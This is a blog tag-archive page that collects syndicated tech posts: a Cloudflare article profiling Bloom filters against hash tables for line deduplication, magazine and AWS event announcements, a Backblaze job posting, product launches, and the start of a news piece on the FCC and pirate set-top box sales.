Tag Archives: Tools

When Bloom filters don’t bloom

Post Syndicated from Marek Majkowski original https://blog.cloudflare.com/when-bloom-filters-dont-bloom/

When Bloom filters don't bloom

When Bloom filters don't bloom

I’ve known about Bloom filters (named after Burton Bloom) since university, but I haven’t had an opportunity to use them in anger. Last month this changed – I became fascinated with the promise of this data structure, but I quickly realized it had some drawbacks. This blog post is the tale of my brief love affair with Bloom filters.

While doing research about IP spoofing, I needed to examine whether the source IP addresses extracted from packets reaching our servers were legitimate, depending on the geographical location of our data centers. For example, source IPs belonging to a legitimate Italian ISP should not arrive in a Brazilian datacenter. This problem might sound simple, but in the ever-evolving landscape of the internet this is far from easy. Suffice it to say I ended up with many large text files with data like this:

When Bloom filters don't bloom

This reads as: the IP 192.0.2.1 was recorded reaching Cloudflare data center number 107 with a legitimate request. This data came from many sources, including our active and passive probes, logs of certain domains we own (like cloudflare.com), public sources (like BGP table), etc. The same line would usually be repeated across multiple files.

I ended up with a gigantic collection of data of this kind. At some point I counted 1 billion lines across all the harvested sources. I usually write bash scripts to pre-process the inputs, but at this scale this approach wasn’t working. For example, removing duplicates from this tiny file of a meager 600MiB and 40M lines, took… about an eternity:

When Bloom filters don't bloom

Enough to say that deduplicating lines using the usual bash commands like ‘sort’ in various configurations (see ‘–parallel’, ‘–buffer-size’ and ‘–unique’) was not optimal for such a large data set.

Bloom filters to the rescue

When Bloom filters don't bloom

Image by David Eppstein Public Domain

Then I had a brainwave – it’s not necessary to sort the lines! I just need to remove duplicated lines – using some kind of "set" data structure should be much faster. Furthermore, I roughly know the cardinality of the input file (number of unique lines), and I can live with some data points being lost – using a probabilistic data structure is fine!

Bloom-filters are a perfect fit!

While you should go and read Wikipedia on Bloom Filters, here is how I look at this data structure.

How would you implement a "set"? Given a perfect hash function, and infinite memory, we could just create an infinite bit array and set a bit number ‘hash(item)’ for each item we encounter. This would give us a perfect "set" data structure. Right? Trivial. Sadly, hash functions have collisions and infinite memory doesn’t exist, so we have to compromise in our reality. But we can calculate and manage the probability of collisions. For example, imagine we have a good hash function, and 128GiB of memory. We can calculate the probability of the second item added to the bit array colliding would be 1 in 1099511627776. The probability of collision when adding more items worsens as we fill up the bit array.

Furthermore, we could use more than one hash function, and end up with a denser bit array. This is exactly what Bloom filters optimize for. A Bloom filter is a bunch of math on top of the four variables:

  • ‘n’ – The number of input elements (cardinality)
  • ‘m’ – Memory used by the bit-array
  • ‘k’ – Number of hash functions counted for each input
  • ‘p’ – Probability of a false positive match

Given the ‘n’ input cardinality and the ‘p’ desired probability of false positive, the Bloom filter math returns the ‘m’ memory required and ‘k’ number of hash functions needed.

Check out this excellent visualization by Thomas Hurst showing how parameters influence each other:

mmuniq-bloom

Guided by this intuition, I set out on a journey to add a new tool to my toolbox – ‘mmuniq-bloom’, a probabilistic tool that, given input on STDIN, returns only unique lines on STDOUT, hopefully much faster than ‘sort’ + ‘uniq’ combo!

Here it is:

For simplicity and speed I designed ‘mmuniq-bloom’ with a couple of assumptions. First, unless otherwise instructed, it uses 8 hash functions k=8. This seems to be a close to optimal number for the data sizes I’m working with, and the hash function can quickly output 8 decent hashes. Then we align ‘m’, number of bits in the bit array, to be a power of two. This is to avoid the pricey % modulo operation, which compiles down to slow assembly ‘div’. With power-of-two sizes we can just do bitwise AND. (For a fun read, see how compilers can optimize some divisions by using multiplication by a magic constant.)

We can now run it against the same data file we used before:

When Bloom filters don't bloom

Oh, this is so much better! 12 seconds is much more manageable than 2 minutes before. But hold on… The program is using an optimized data structure, relatively limited memory footprint, optimized line-parsing and good output buffering… 12 seconds is still eternity compared to ‘wc -l’ tool:

When Bloom filters don't bloom

What is going on? I understand that counting lines by ‘wc’ is easier than figuring out unique lines, but is it really worth the 26x difference? Where does all the CPU in ‘mmuniq-bloom’ go?

It must be my hash function. ‘wc’ doesn’t need to spend all this CPU performing all this strange math for each of the 40M lines on input. I’m using a pretty non-trivial ‘siphash24’ hash function, so it surely burns the CPU, right? Let’s check by running the code computing hash function but not doing any Bloom filter operations:

When Bloom filters don't bloom

This is strange. Counting the hash function indeed costs about 2s, but the program took 12s in the previous run. The Bloom filter alone takes 10 seconds? How is that possible? It’s such a simple data structure…

A secret weapon – a profiler

It was time to use a proper tool for the task – let’s fire up a profiler and see where the CPU goes. First, let’s fire an ‘strace’ to confirm we are not running any unexpected syscalls:

When Bloom filters don't bloom

Everything looks good. The 10 calls to ‘mmap’ each taking 4ms (3971 us) is intriguing, but it’s fine. We pre-populate memory up front with ‘MAP_POPULATE’ to save on page faults later.

What is the next step? Of course Linux’s ‘perf’!

When Bloom filters don't bloom

Then we can see the results:

When Bloom filters don't bloom

Right, so we indeed burn 87.2% of cycles in our hot code. Let’s see where exactly. Doing ‘perf annotate process_line –source’ quickly shows something I didn’t expect.

When Bloom filters don't bloom

You can see 26.90% of CPU burned in the ‘mov’, but that’s not all of it! The compiler correctly inlined the function, and unrolled the loop 8-fold. Summed up that ‘mov’ or ‘uint64_t v = *p’ line adds up to a great majority of cycles!

When Bloom filters don't bloom

Clearly ‘perf’ must be mistaken, how can such a simple line cost so much? We can repeat the benchmark with any other profiler and it will show us the same problem. For example, I like using ‘google-perftools’ with kcachegrind since they emit eye-candy charts:

When Bloom filters don't bloom

The rendered result looks like this:

When Bloom filters don't bloom

Allow me to summarise what we found so far.

The generic ‘wc’ tool takes 0.45s CPU time to process 600MiB file. Our optimized ‘mmuniq-bloom’ tool takes 12 seconds. CPU is burned on one ‘mov’ instruction, dereferencing memory….

When Bloom filters don't bloom

Image by Jose Nicdao CC BY/2.0

Oh! I how could I have forgotten. Random memory access is slow! It’s very, very, very slow!

According to the rule of thumb "latency numbers every programmer should know about", one RAM fetch is about 100ns. Let’s do the math: 40 million lines, 8 hashes counted for each line. Since our Bloom filter is 128MiB, on our older hardware it doesn’t fit into L3 cache! The hashes are uniformly distributed across the large memory range – each hash generates a memory miss. Adding it together that’s…

When Bloom filters don't bloom

That suggests 32 seconds burned just on memory fetches. The real program is faster, taking only 12s. This is because, although the Bloom filter data does not completely fit into L3 cache, it still gets some benefit from caching. It’s easy to see with ‘perf stat -d’:

When Bloom filters don't bloom

Right, so we should have had at least 320M LLC-load-misses, but we had only 280M. This still doesn’t explain why the program was running only 12 seconds. But it doesn’t really matter. What matters is that the number of cache misses is a real problem and we can only fix it by reducing the number of memory accesses. Let’s try tuning Bloom filter to use only one hash function:

When Bloom filters don't bloom

Ouch! That really hurt! The Bloom filter required 64 GiB of memory to get our desired false positive probability ratio of 1-error-per-10k-lines. This is terrible!

Also, it doesn’t seem like we improved much. It took the OS 22 seconds to prepare memory for us, but we still burned 11 seconds in userspace. I guess this time any benefits from hitting memory less often were offset by lower cache-hit probability due to drastically increased memory size. In previous runs we required only 128MiB for the Bloom filter!

Dumping Bloom filters altogether

This is getting ridiculous. To get the same false positive guarantees we either must use many hashes in Bloom filter (like 8) and therefore many memory operations, or we can have 1 hash function, but enormous memory requirements.

We aren’t really constrained by available memory, instead we want to optimize for reduced memory accesses. All we need is a data structure that requires at most 1 memory miss per item, and use less than 64 Gigs of RAM…

While we could think of more sophisticated data structures like Cuckoo filter, maybe we can be simpler. How about a good old simple hash table with linear probing?

When Bloom filters don't bloom
Image by Vadims Podāns

Welcome mmuniq-hash

Here you can find a tweaked version of mmuniq-bloom, but using hash table:

Instead of storing bits as for the Bloom-filter, we are now storing 64-bit hashes from the ‘siphash24’ function. This gives us much stronger probability guarantees, with probability of false positives much better than one error in 10k lines.

Let’s do the math. Adding a new item to a hash table containing, say 40M, entries has ’40M/2^64′ chances of hitting a hash collision. This is about one in 461 billion – a reasonably low probability. But we are not adding one item to a pre-filled set! Instead we are adding 40M lines to the initially empty set. As per birthday paradox this has much higher chances of hitting a collision at some point. A decent approximation is ‘~n^2/2m’, which in our case is ‘~(40M^2)/(2*(2^64))’. This is a chance of one in 23000. In other words, assuming we are using good hash function, every one in 23 thousand random sets of 40M items, will have a hash collision. This practical chance of hitting a collision is non-negligible, but it’s still better than a Bloom filter and totally acceptable for my use case.

The hash table code runs faster, has better memory access patterns and better false positive probability than the Bloom filter approach.

When Bloom filters don't bloom

Don’t be scared about the "hash conflicts" line, it just indicates how full the hash table was. We are using linear probing, so when a bucket is already used, we just pick up the next empty bucket. In our case we had to skip over 0.7 buckets on average to find an empty slot in the table. This is fine and, since we iterate over the buckets in linear order, we can expect the memory to be nicely prefetched.

From the previous exercise we know our hash function takes about 2 seconds of this. Therefore, it’s fair to say 40M memory hits take around 4 seconds.

Lessons learned

Modern CPUs are really good at sequential memory access when it’s possible to predict memory fetch patterns (see Cache prefetching). Random memory access on the other hand is very costly.

Advanced data structures are very interesting, but beware. Modern computers require cache-optimized algorithms. When working with large datasets, not fitting L3, prefer optimizing for reduced number loads, over optimizing the amount of memory used.

I guess it’s fair to say that Bloom filters are great, as long as they fit into the L3 cache. The moment this assumption is broken, they are terrible. This is not news, Bloom filters optimize for memory usage, not for memory access. For example, see the Cuckoo Filters paper.

Another thing is the ever-lasting discussion about hash functions. Frankly – in most cases it doesn’t matter. The cost of counting even complex hash functions like ‘siphash24’ is small compared to the cost of random memory access. In our case simplifying the hash function will bring only small benefits. The CPU time is simply spent somewhere else – waiting for memory!

One colleague often says: "You can assume modern CPUs are infinitely fast. They run at infinite speed until they hit the memory wall".

Finally, don’t follow my mistakes – everyone should start profiling with ‘perf stat -d’ and look at the "Instructions per cycle" (IPC) counter. If it’s below 1, it generally means the program is stuck on waiting for memory. Values above 2 would be great, it would mean the workload is mostly CPU-bound. Sadly, I’m yet to see high values in the workloads I’m dealing with…

Improved mmuniq

With the help of my colleagues I’ve prepared a further improved version of the ‘mmuniq’ hash table based tool. See the code:

It is able to dynamically resize the hash table, to support inputs of unknown cardinality. Then, by using batching, it can effectively use the ‘prefetch’ CPU hint, speeding up the program by 35-40%. Beware, sprinkling the code with ‘prefetch’ rarely works. Instead, I specifically changed the flow of algorithms to take advantage of this instruction. With all the improvements I got the run time down to 2.1 seconds:

When Bloom filters don't bloom

The end

Writing this basic tool which tries to be faster than ‘sort | uniq’ combo revealed some hidden gems of modern computing. With a bit of work we were able to speed it up from more than two minutes to 2 seconds. During this journey we learned about random memory access latency, and the power of cache friendly data structures. Fancy data structures are exciting, but in practice reducing random memory loads often brings better results.

Hackspace magazine 9: tools, tools, tools

Post Syndicated from Andrew Gregory original https://www.raspberrypi.org/blog/hackspace-magazine-9/

Rejoice! It’s time for a new issue of Hackspace magazine, packed with things for you to make, build, hack, and create!

raspberry pi press hackspace magazine

 

HackSpace magazine issue 9

Tools: they’re what separates humans from the apes! Whereas apes use whatever they find around them to get honey, pick pawpaws, and avoid prickly pears, we humans take the step of making things with which to make other things. That’s why in this issue of HackSpace magazine, we look at 50 essential tools to make you better at making (and by extension better at being a human). Take a look, decide which ones you need, and imagine the projects that will be possible with your shiny new stuff.

Konichiwakitty

In issue 9, we feature Konichiwakitty, known as Rachel Wong to her friends, who is taking the maker world by storm with her range of electronic wearables.



Alongside making wearables and researching stem cells, she also advocates for getting young people into crafting, including making their own wearables!

Helping

Remap is a fantastic organisation. It’s comprised of volunteer makers and builders who use their skills to adapt the world and build tech to help people with disabilities. Everyone in the maker community can do amazing stuff, and it’s wonderful that so many of you offer your time and skills for free to benefit people in need.

Music

The band Echo and the Bunnymen famously credited a drum machine as a band member, and with our tutorial, you too can build your own rhythm section using a Teensy microcontroller, a breadboard, and a few buttons.



And if that’s not enough electro beats for you, we’ve also got a guide to generating MIDI inputs with a joystick — because keyboards and frets are so passé.

Pi Wars

Having shiny new stuff on its own isn’t enough to spur most people to action. No, they need a reason to make, for example total mechanical dominance over their competitors. Offering an arena for such contests is the continuing mission of Tim Richardson, who along with Mike Horne created Pi Wars.



In its five-ish years, Pi Wars has become one of the biggest events on the UK maker calendar, with an inspired mix of robots, making, programming, and healthy competition. We caught up with Tim to find out how to make a maker event, what’s next for Pi Wars, and how to build a robot to beat the best.

Fame

Do you ever lie awake at night wondering how many strangers on the internet like you? If so (or if you have a business with a social media presence, which seems more likely), you might be interested in our tutorial for a social media follower counter.

raspberry pi press hackspace magazine

This build takes raw numbers from the internet’s shouting forums and turns them into physical validation, so you can watch your follower count increase in real time as you shout into the void about whether Football’s Coming Home. 

And there’s more…

In this issue, you can also:

  • See how to use the Google AIY Projects Vision kit to turn a humble water pistol into a single-minded dousing machine that doesn’t feel pity, fear, or remorse
  • Find out how to make chocolate in whatever shape you want
  • Learn from a maker who put 20 hours work into a project only to melt her PCBs and have to start all over again (spoiler alert: it all worked out in the end)

All this, plus a bunch of reviews and many, many more projects to dig into, in Hackspace magazine issue 9.

Get your copy of HackSpace magazine

If you like the sound of this month’s content, you can find HackSpace magazine in WHSmith, Tesco, Sainsbury’s, and independent newsagents in the UK. If you live in the US, check out your local Barnes & Noble, Fry’s, or Micro Center next week. We’re also shipping to stores in Australia, Hong Kong, Canada, Singapore, Belgium, and Brazil, so be sure to ask your local newsagent whether they’ll be getting HackSpace magazine. And if you’d rather try before you buy, you can always download the free PDF.

Subscribe now

Subscribe now” may not be subtle as a marketing message, but we really think you should. You’ll get the magazine early, plus a lovely physical paper copy, which has really good battery life.

raspberry pi press hackspace magazine

Oh, and 12-month print subscribers get an Adafruit Circuit Playground Express loaded with inputs and sensors and ready for your next project.

The post Hackspace magazine 9: tools, tools, tools appeared first on Raspberry Pi.

AWS Online Tech Talks – June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-june-2018/

AWS Online Tech Talks – June 2018

Join us this month to learn about AWS services and solutions. New this month, we have a fireside chat with the GM of Amazon WorkSpaces and our 2nd episode of the “How to re:Invent” series. We’ll also cover best practices, deep dives, use cases and more! Join us and register today!

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

 

Analytics & Big Data

June 18, 2018 | 11:00 AM – 11:45 AM PTGet Started with Real-Time Streaming Data in Under 5 Minutes – Learn how to use Amazon Kinesis to capture, store, and analyze streaming data in real-time including IoT device data, VPC flow logs, and clickstream data.
June 20, 2018 | 11:00 AM – 11:45 AM PT – Insights For Everyone – Deploying Data across your Organization – Learn how to deploy data at scale using AWS Analytics and QuickSight’s new reader role and usage based pricing.

 

AWS re:Invent
June 13, 2018 | 05:00 PM – 05:30 PM PTEpisode 2: AWS re:Invent Breakout Content Secret Sauce – Hear from one of our own AWS content experts as we dive deep into the re:Invent content strategy and how we maintain a high bar.
Compute

June 25, 2018 | 01:00 PM – 01:45 PM PTAccelerating Containerized Workloads with Amazon EC2 Spot Instances – Learn how to efficiently deploy containerized workloads and easily manage clusters at any scale at a fraction of the cost with Spot Instances.

June 26, 2018 | 01:00 PM – 01:45 PM PTEnsuring Your Windows Server Workloads Are Well-Architected – Get the benefits, best practices and tools on running your Microsoft Workloads on AWS leveraging a well-architected approach.

 

Containers
June 25, 2018 | 09:00 AM – 09:45 AM PTRunning Kubernetes on AWS – Learn about the basics of running Kubernetes on AWS including how setup masters, networking, security, and add auto-scaling to your cluster.

 

Databases

June 18, 2018 | 01:00 PM – 01:45 PM PTOracle to Amazon Aurora Migration, Step by Step – Learn how to migrate your Oracle database to Amazon Aurora.
DevOps

June 20, 2018 | 09:00 AM – 09:45 AM PTSet Up a CI/CD Pipeline for Deploying Containers Using the AWS Developer Tools – Learn how to set up a CI/CD pipeline for deploying containers using the AWS Developer Tools.

 

Enterprise & Hybrid
June 18, 2018 | 09:00 AM – 09:45 AM PTDe-risking Enterprise Migration with AWS Managed Services – Learn how enterprise customers are de-risking cloud adoption with AWS Managed Services.

June 19, 2018 | 11:00 AM – 11:45 AM PTLaunch AWS Faster using Automated Landing Zones – Learn how the AWS Landing Zone can automate the set up of best practice baselines when setting up new

 

AWS Environments

June 21, 2018 | 11:00 AM – 11:45 AM PTLeading Your Team Through a Cloud Transformation – Learn how you can help lead your organization through a cloud transformation.

June 21, 2018 | 01:00 PM – 01:45 PM PTEnabling New Retail Customer Experiences with Big Data – Learn how AWS can help retailers realize actual value from their big data and deliver on differentiated retail customer experiences.

June 28, 2018 | 01:00 PM – 01:45 PM PTFireside Chat: End User Collaboration on AWS – Learn how End User Compute services can help you deliver access to desktops and applications anywhere, anytime, using any device.
IoT

June 27, 2018 | 11:00 AM – 11:45 AM PTAWS IoT in the Connected Home – Learn how to use AWS IoT to build innovative Connected Home products.

 

Machine Learning

June 19, 2018 | 09:00 AM – 09:45 AM PTIntegrating Amazon SageMaker into your Enterprise – Learn how to integrate Amazon SageMaker and other AWS Services within an Enterprise environment.

June 21, 2018 | 09:00 AM – 09:45 AM PTBuilding Text Analytics Applications on AWS using Amazon Comprehend – Learn how you can unlock the value of your unstructured data with NLP-based text analytics.

 

Management Tools

June 20, 2018 | 01:00 PM – 01:45 PM PTOptimizing Application Performance and Costs with Auto Scaling – Learn how selecting the right scaling option can help optimize application performance and costs.

 

Mobile
June 25, 2018 | 11:00 AM – 11:45 AM PTDrive User Engagement with Amazon Pinpoint – Learn how Amazon Pinpoint simplifies and streamlines effective user engagement.

 

Security, Identity & Compliance

June 26, 2018 | 09:00 AM – 09:45 AM PTUnderstanding AWS Secrets Manager – Learn how AWS Secrets Manager helps you rotate and manage access to secrets centrally.
June 28, 2018 | 09:00 AM – 09:45 AM PTUsing Amazon Inspector to Discover Potential Security Issues – See how Amazon Inspector can be used to discover security issues of your instances.

 

Serverless

June 19, 2018 | 01:00 PM – 01:45 PM PTProductionize Serverless Application Building and Deployments with AWS SAM – Learn expert tips and techniques for building and deploying serverless applications at scale with AWS SAM.

 

Storage

June 26, 2018 | 11:00 AM – 11:45 AM PTDeep Dive: Hybrid Cloud Storage with AWS Storage Gateway – Learn how you can reduce your on-premises infrastructure by using the AWS Storage Gateway to connecting your applications to the scalable and reliable AWS storage services.
June 27, 2018 | 01:00 PM – 01:45 PM PTChanging the Game: Extending Compute Capabilities to the Edge – Discover how to change the game for IIoT and edge analytics applications with AWS Snowball Edge plus enhanced Compute instances.
June 28, 2018 | 11:00 AM – 11:45 AM PTBig Data and Analytics Workloads on Amazon EFS – Get best practices and deployment advice for running big data and analytics workloads on Amazon EFS.

Microsoft acquires GitHub

Post Syndicated from corbet original https://lwn.net/Articles/756443/rss

Here’s the
press release
announcing Microsoft’s agreement to acquire GitHub for a
mere $7.5 billion. “GitHub will retain its developer-first
ethos and will operate independently to provide an open platform for all
developers in all industries. Developers will continue to be able to use
the programming languages, tools and operating systems of their choice for
their projects — and will still be able to deploy their code to any
operating system, any cloud and any device.

Amazon SageMaker Updates – Tokyo Region, CloudFormation, Chainer, and GreenGrass ML

Post Syndicated from Randall Hunt original https://aws.amazon.com/blogs/aws/sagemaker-tokyo-summit-2018/

Today, at the AWS Summit in Tokyo we announced a number of updates and new features for Amazon SageMaker. Starting today, SageMaker is available in Asia Pacific (Tokyo)! SageMaker also now supports CloudFormation. A new machine learning framework, Chainer, is now available in the SageMaker Python SDK, in addition to MXNet and Tensorflow. Finally, support for running Chainer models on several devices was added to AWS Greengrass Machine Learning.

Amazon SageMaker Chainer Estimator


Chainer is a popular, flexible, and intuitive deep learning framework. Chainer networks work on a “Define-by-Run” scheme, where the network topology is defined dynamically via forward computation. This is in contrast to many other frameworks which work on a “Define-and-Run” scheme where the topology of the network is defined separately from the data. A lot of developers enjoy the Chainer scheme since it allows them to write their networks with native python constructs and tools.

Luckily, using Chainer with SageMaker is just as easy as using a TensorFlow or MXNet estimator. In fact, it might even be a bit easier since it’s likely you can take your existing scripts and use them to train on SageMaker with very few modifications. With TensorFlow or MXNet users have to implement a train function with a particular signature. With Chainer your scripts can be a little bit more portable as you can simply read from a few environment variables like SM_MODEL_DIR, SM_NUM_GPUS, and others. We can wrap our existing script in a if __name__ == '__main__': guard and invoke it locally or on sagemaker.


import argparse
import os

if __name__ =='__main__':

    parser = argparse.ArgumentParser()

    # hyperparameters sent by the client are passed as command-line arguments to the script.
    parser.add_argument('--epochs', type=int, default=10)
    parser.add_argument('--batch-size', type=int, default=64)
    parser.add_argument('--learning-rate', type=float, default=0.05)

    # Data, model, and output directories
    parser.add_argument('--output-data-dir', type=str, default=os.environ['SM_OUTPUT_DATA_DIR'])
    parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR'])
    parser.add_argument('--train', type=str, default=os.environ['SM_CHANNEL_TRAIN'])
    parser.add_argument('--test', type=str, default=os.environ['SM_CHANNEL_TEST'])

    args, _ = parser.parse_known_args()

    # ... load from args.train and args.test, train a model, write model to args.model_dir.

Then, we can run that script locally or use the SageMaker Python SDK to launch it on some GPU instances in SageMaker. The hyperparameters will get passed in to the script as CLI commands and the environment variables above will be autopopulated. When we call fit the input channels we pass will be populated in the SM_CHANNEL_* environment variables.


from sagemaker.chainer.estimator import Chainer
# Create my estimator
chainer_estimator = Chainer(
    entry_point='example.py',
    train_instance_count=1,
    train_instance_type='ml.p3.2xlarge',
    hyperparameters={'epochs': 10, 'batch-size': 64}
)
# Train my estimator
chainer_estimator.fit({'train': train_input, 'test': test_input})

# Deploy my estimator to a SageMaker Endpoint and get a Predictor
predictor = chainer_estimator.deploy(
    instance_type="ml.m4.xlarge",
    initial_instance_count=1
)

Now, instead of bringing your own docker container for training and hosting with Chainer, you can just maintain your script. You can see the full sagemaker-chainer-containers on github. One of my favorite features of the new container is built-in chainermn for easy multi-node distribution of your chainer training jobs.

There’s a lot more documentation and information available in both the README and the example notebooks.

AWS GreenGrass ML with Chainer

AWS GreenGrass ML now includes a pre-built Chainer package for all devices powered by Intel Atom, NVIDIA Jetson, TX2, and Raspberry Pi. So, now GreenGrass ML provides pre-built packages for TensorFlow, Apache MXNet, and Chainer! You can train your models on SageMaker then easily deploy it to any GreenGrass-enabled device using GreenGrass ML.

JAWS UG

I want to give a quick shout out to all of our wonderful and inspirational friends in the JAWS UG who attended the AWS Summit in Tokyo today. I’ve very much enjoyed seeing your pictures of the summit. Thanks for making Japan an amazing place for AWS developers! I can’t wait to visit again and meet with all of you.

Randall

Monitoring with Azure and Grafana

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/05/31/monitoring-with-azure-and-grafana/

Monitoring with Azure and Grafana What is whitebox monitoring?
Why do we monitor our systems?
What is the Azure Monitor plugin and how can I use it to monitor my Azure resources?
Recently, I spoke at Swetugg 2018, a .NET conference held in Stockholm, Sweden to answer these questions. In this video you’ll learn some basic monitoring principles, some of the tools we use to monitor our systems, and get an inside look at the new Azure Monitor plugin for Grafana.

Hiring a Director of Sales

Post Syndicated from Yev original https://www.backblaze.com/blog/hiring-a-director-of-sales/

Backblaze is hiring a Director of Sales. This is a critical role for Backblaze as we continue to grow the team. We need a strong leader who has experience in scaling a sales team and who has an excellent track record for exceeding goals by selling Software as a Service (SaaS) solutions. In addition, this leader will need to be highly motivated, as well as able to create and develop a highly-motivated, success oriented sales team that has fun and enjoys what they do.

The History of Backblaze from our CEO
In 2007, after a friend’s computer crash caused her some suffering, we realized that with every photo, video, song, and document going digital, everyone would eventually lose all of their information. Five of us quit our jobs to start a company with the goal of making it easy for people to back up their data.

Like many startups, for a while we worked out of a co-founder’s one-bedroom apartment. Unlike most startups, we made an explicit agreement not to raise funding during the first year. We would then touch base every six months and decide whether to raise or not. We wanted to focus on building the company and the product, not on pitching and slide decks. And critically, we wanted to build a culture that understood money comes from customers, not the magical VC giving tree. Over the course of 5 years we built a profitable, multi-million dollar revenue business — and only then did we raise a VC round.

Fast forward 10 years later and our world looks quite different. You’ll have some fantastic assets to work with:

  • A brand millions recognize for openness, ease-of-use, and affordability.
  • A computer backup service that stores over 500 petabytes of data, has recovered over 30 billion files for hundreds of thousands of paying customers — most of whom self-identify as being the people that find and recommend technology products to their friends.
  • Our B2 service that provides the lowest cost cloud storage on the planet at 1/4th the price Amazon, Google or Microsoft charges. While being a newer product on the market, it already has over 100,000 IT and developers signed up as well as an ecosystem building up around it.
  • A growing, profitable and cash-flow positive company.
  • And last, but most definitely not least: a great sales team.

You might be saying, “sounds like you’ve got this under control — why do you need me?” Don’t be misled. We need you. Here’s why:

  • We have a great team, but we are in the process of expanding and we need to develop a structure that will easily scale and provide the most success to drive revenue.
  • We just launched our outbound sales efforts and we need someone to help develop that into a fully successful program that’s building a strong pipeline and closing business.
  • We need someone to work with the marketing department and figure out how to generate more inbound opportunities that the sales team can follow up on and close.
  • We need someone who will work closely in developing the skills of our current sales team and build a path for career growth and advancement.
  • We want someone to manage our Customer Success program.

So that’s a bit about us. What are we looking for in you?

Experience: As a sales leader, you will strategically build and drive the territory’s sales pipeline by assembling and leading a skilled team of sales professionals. This leader should be familiar with generating, developing and closing software subscription (SaaS) opportunities. We are looking for a self-starter who can manage a team and make an immediate impact of selling our Backup and Cloud Storage solutions. In this role, the sales leader will work closely with the VP of Sales, marketing staff, and service staff to develop and implement specific strategic plans to achieve and exceed revenue targets, including new business acquisition as well as build out our customer success program.

Leadership: We have an experienced team who’s brought us to where we are today. You need to have the people and management skills to get them excited about working with you. You need to be a strong leader and compassionate about developing and supporting your team.

Data driven and creative: The data has to show something makes sense before we scale it up. However, without creativity, it’s easy to say “the data shows it’s impossible” or to find a local maximum. Whether it’s deciding how to scale the team, figuring out what our outbound sales efforts should look like or putting a plan in place to develop the team for career growth, we’ve seen a bit of creativity get us places a few extra dollars couldn’t.

Jive with our culture: Strong leaders affect culture and the person we hire for this role may well shape, not only fit into, ours. But to shape the culture you have to be accepted by the organism, which means a certain set of shared values. We default to openness with our team, our customers, and everyone if possible. We love initiative — without arrogance or dictatorship. We work to create a place people enjoy showing up to work. That doesn’t mean ping pong tables and foosball (though we do try to have perks & fun), but it means people are friendly, non-political, working to build a good service but also a good place to work.

Do the work: Ideas and strategy are critical, but good execution makes them happen. We’re looking for someone who can help the team execute both from the perspective of being capable of guiding and organizing, but also someone who is hands-on themselves.

Additional Responsibilities needed for this role:

  • Recruit, coach, mentor, manage and lead a team of sales professionals to achieve yearly sales targets. This includes closing new business and expanding upon existing clientele.
  • Expand the customer success program to provide the best customer experience possible resulting in upsell opportunities and a high retention rate.
  • Develop effective sales strategies and deliver compelling product demonstrations and sales pitches.
  • Acquire and develop the appropriate sales tools to make the team efficient in their daily work flow.
  • Apply a thorough understanding of the marketplace, industry trends, funding developments, and products to all management activities and strategic sales decisions.
  • Ensure that sales department operations function smoothly, with the goal of facilitating sales and/or closings; operational responsibilities include accurate pipeline reporting and sales forecasts.
  • This position will report directly to the VP of Sales and will be staffed in our headquarters in San Mateo, CA.

Requirements:

  • 7 – 10+ years of successful sales leadership experience as measured by sales performance against goals.
    Experience in developing skill sets and providing career growth and opportunities through advancement of team members.
  • Background in selling SaaS technologies with a strong track record of success.
  • Strong presentation and communication skills.
  • Must be able to travel occasionally nationwide.
  • BA/BS degree required

Think you want to join us on this adventure?
Send an email to jobscontact@backblaze.com with the subject “Director of Sales.” (Recruiters and agencies, please don’t email us.) Include a resume and answer these two questions:

  1. How would you approach evaluating the current sales team and what is your process for developing a growth strategy to scale the team?
  2. What are the goals you would set for yourself in the 3 month and 1-year timeframes?

Thank you for taking the time to read this and I hope that this sounds like the opportunity for which you’ve been waiting.

Backblaze is an Equal Opportunity Employer.

The post Hiring a Director of Sales appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Amazon Neptune Generally Available

Post Syndicated from Randall Hunt original https://aws.amazon.com/blogs/aws/amazon-neptune-generally-available/

Amazon Neptune is now Generally Available in US East (N. Virginia), US East (Ohio), US West (Oregon), and EU (Ireland). Amazon Neptune is a fast, reliable, fully-managed graph database service that makes it easy to build and run applications that work with highly connected datasets. At the core of Neptune is a purpose-built, high-performance graph database engine optimized for storing billions of relationships and querying the graph with millisecond latencies. Neptune supports two popular graph models, Property Graph and RDF, through Apache TinkerPop Gremlin and SPARQL, allowing you to easily build queries that efficiently navigate highly connected datasets. Neptune can be used to power everything from recommendation engines and knowledge graphs to drug discovery and network security. Neptune is fully-managed with automatic minor version upgrades, backups, encryption, and fail-over. I wrote about Neptune in detail for AWS re:Invent last year and customers have been using the preview and providing great feedback that the team has used to prepare the service for GA.

Now that Amazon Neptune is generally available there are a few changes from the preview:

Launching an Amazon Neptune Cluster

Launching a Neptune cluster is as easy as navigating to the AWS Management Console and clicking create cluster. Of course you can also launch with CloudFormation, the CLI, or the SDKs.

You can monitor your cluster health and the health of individual instances through Amazon CloudWatch and the console.

Additional Resources

We’ve created two repos with some additional tools and examples here. You can expect continuous development on these repos as we add additional tools and examples.

  • Amazon Neptune Tools Repo
    This repo has a useful tool for converting GraphML files into Neptune compatible CSVs for bulk loading from S3.
  • Amazon Neptune Samples Repo
    This repo has a really cool example of building a collaborative filtering recommendation engine for video game preferences.

Purpose Built Databases

There’s an industry trend where we’re moving more and more onto purpose-built databases. Developers and businesses want to access their data in the format that makes the most sense for their applications. As cloud resources make transforming large datasets easier with tools like AWS Glue, we have a lot more options than we used to for accessing our data. With tools like Amazon Redshift, Amazon Athena, Amazon Aurora, Amazon DynamoDB, and more we get to choose the best database for the job or even enable entirely new use-cases. Amazon Neptune is perfect for workloads where the data is highly connected across data rich edges.

I’m really excited about graph databases and I see a huge number of applications. Looking for ideas of cool things to build? I’d love to build a web crawler in AWS Lambda that uses Neptune as the backing store. You could further enrich it by running Amazon Comprehend or Amazon Rekognition on the text and images found and creating a search engine on top of Neptune.

As always, feel free to reach out in the comments or on twitter to provide any feedback!

Randall

FCC Asks Amazon & eBay to Help Eliminate Pirate Media Box Sales

Post Syndicated from Andy original https://torrentfreak.com/fcc-asks-amazon-ebay-to-help-eliminate-pirate-media-box-sales-180530/

Over the past several years, anyone looking for a piracy-configured set-top box could do worse than search for one on Amazon or eBay.

Historically, people deploying search terms including “Kodi” or “fully-loaded” were greeted by page after page of Android-type boxes, each ready for illicit plug-and-play entertainment consumption following delivery.

